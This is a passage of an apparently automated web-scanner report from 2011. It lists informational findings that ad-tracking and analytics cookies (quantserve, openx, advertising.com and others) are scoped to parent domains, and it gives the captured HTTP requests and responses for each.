Set-Cookie: apd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: afl=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 15:32:28 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40

<!-- opt out exists or ip filtered -->

12.46. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1150096029;fpan=1;fpa=P0-1990433296-1315339228713;ns=0;url=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss%26categories%3Dexclude;ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1315339228711;tzo=300;a=p-9eJ8k4iSzux46;labels=CNBC.Section.search%2CCNBC.Sub%20Section.Search%7CAll HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EF8BHwHSB4EQCa0QvYgQAshAHxA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EKwBGAHSB7vRG9iBDYQh8Q; expires=Mon, 05-Dec-2011 15:00:28 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Tue, 06 Sep 2011 15:00:28 GMT
Server: QS


12.47. http://public.deloitte.com/media/00Global/social_links/dtt_email_16x16.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://public.deloitte.com
Path:   /media/00Global/social_links/dtt_email_16x16.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/00Global/social_links/dtt_email_16x16.gif HTTP/1.1
Host: public.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/Services/additional-services/talent-human-capital-hr/Talent-Library/558d34d8a3a2f210VgnVCM3000001c56f00aRCRD.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; __utma=55230644.1519156675.1315342619.1315342619.1315342619.1; __utmc=55230644; __utmz=55230644.1315342619.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=56; SC_LINKS=us%3Asearch%5E%5ETalent%5E%5Eus%3Asearch%20%7C%20Talent%5E%5E; s_nr=1315345935038-Repeat; s_vnum=1747342618651%26vn%3D2; s_invisit=true; s_ppg=us%3Asearch; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%25253Asearch%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.deloitte.com%25252Fview%25252Fen_US%25252Fus%25252FServices%25252Fadditional-services%25252Ftalent-human-capital-hr%25252FTalent_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 16:52:17 GMT
Set-Cookie: SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; expires=Monday, 01-Jan-2035 00:00:00 GMT; path=/; domain=.deloitte.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Date: Tue, 06 Sep 2011 16:52:17 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Thu, 06 Aug 2009 16:11:30 GMT
ETag: "4090ff8eb016ca1:926"
Content-Length: 405

GIF89a........................(........x........K........\...........Z.....$..%..E....p.....    ..'.....P.................x..H............................................................................
...[SNIP]...

12.48. http://r.openx.net/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img?pixel_id=52bb1d64d5b1cddb69e55780dd37f64a HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1315103289; i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:13 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f; expires=Thu, 05-Sep-2013 15:32:13 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

12.49. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341389329&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:36:31 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:36:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:36:31 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=1
...[SNIP]...

12.50. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342006119&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1069543.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:46:48 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:46:48 GMT
Content-Length: 996
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:46:48 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://view.atdmt.com/BVK/iview/349019750/direct/01/8665855478?click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001069543/cstr=12485207=_4e664067,866585
...[SNIP]...

12.51. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315343244277&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 16:07:26 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 16:07:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:07:26 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=1
...[SNIP]...

12.52. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342314330&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:51:56 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:51:56 GMT
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:51:56 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=3
...[SNIP]...

12.53. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340773276&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:26:14 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:26:15 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:26:14 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=3
...[SNIP]...

12.54. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342934886&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 16:02:17 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:02:17 GMT
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:02:17 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=4
...[SNIP]...

12.55. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341697956&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:41:40 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:41:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:41:40 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=6
...[SNIP]...

12.56. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

